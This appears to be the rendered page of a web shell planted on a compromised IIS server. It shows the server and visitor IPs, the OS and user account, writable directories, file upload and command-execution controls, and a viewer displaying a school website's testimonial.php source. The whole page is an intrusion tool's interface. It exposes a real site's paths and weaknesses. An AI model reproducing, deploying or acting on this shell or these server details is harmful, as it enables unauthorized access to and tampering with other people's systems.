403Webshell
Server IP : 68.178.161.82  /  Your IP : 216.73.216.141
Web Server : Microsoft-IIS/10.0
System : Windows NT 82-161-178-68 10.0 build 20348 (Windows Server 2016) AMD64
User : IWAM_plesk(default) ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/lpsc.co.in/gomtinagar.lpsc.co.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Inetpub/vhosts/lpsc.co.in/gomtinagar.lpsc.co.in//testimonial.php




<section class="testimonials-area pb-115 bg_cover" style="background-image: url(assets/images/testimonials-pattern.png)">
        <div class="container">
            <div class="row testimonials-active">

            <?php $sql = "SELECT * from  testimonialgomtinagar order by id";
$query = $dbh -> prepare($sql);
$query->execute();
$results=$query->fetchAll(PDO::FETCH_OBJ);
$cnt=1;
if($query->rowCount() > 0)
{
foreach($results as $result)
{				?>	
                <div class="col-lg-12">
                    <div class="testimonials-content text-center">
                        <i class="fas fa-quote-left"></i>
                        <h2 class="title"><?php echo htmlentities($result->VehiclesTitle);?></h2>
                        <p><?php echo htmlentities($result->ModelYear);?></p>
                        <img src="admin/img/vehicleimages/<?php echo htmlentities($result->Vimage1);?>" alt="blog-details">
                       <br>
                        <span><?php echo htmlentities($result->VehiclesOverview);?></span>
                    </div>
                </div>  
<?php }} ?>
            </div>
        </div>
    </section>

Youez - 2016 - github.com/yon3zu
LinuXploit